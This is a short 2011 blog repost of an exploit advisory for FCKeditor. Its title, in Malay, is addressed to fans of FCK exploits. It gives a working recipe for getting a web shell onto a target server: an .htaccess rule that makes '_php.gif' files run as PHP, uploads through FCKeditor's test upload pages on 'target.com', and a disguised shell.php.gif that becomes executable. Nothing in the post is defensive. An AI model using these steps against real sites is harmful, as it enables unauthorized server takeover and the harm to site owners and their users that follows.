Saturday, 5 November 2011

Bagi Peminat Setia Exploit FCK


[+] Title:bypass all versian FCKeditor with htaccess.

[+] Date: 2011
[+] script:http://sourceforge.net/projects/fckeditor/
[+] Author : pentesters.ir
[+] Website : WwW.PenTesters.IR

---------------------------------------------------------
1.create a htaccess file:
code:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>

2.Now upload this htaccess with FCKeditor.

http://target.com/FCKeditor/editor/filemanager/upload/test.html
http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/t
est.html

---------------------------------------------------------------------------
-------------------
3.Now upload shell.php.gif with FCKeditor.
4.After upload shell.php.gif, the name "shell.php.gif" change to
"shell_php.gif" automatically.

5.http://target.com/anything/shell_php.gif
6.Now shell is available from server.

Credit: Alex John

1 comment: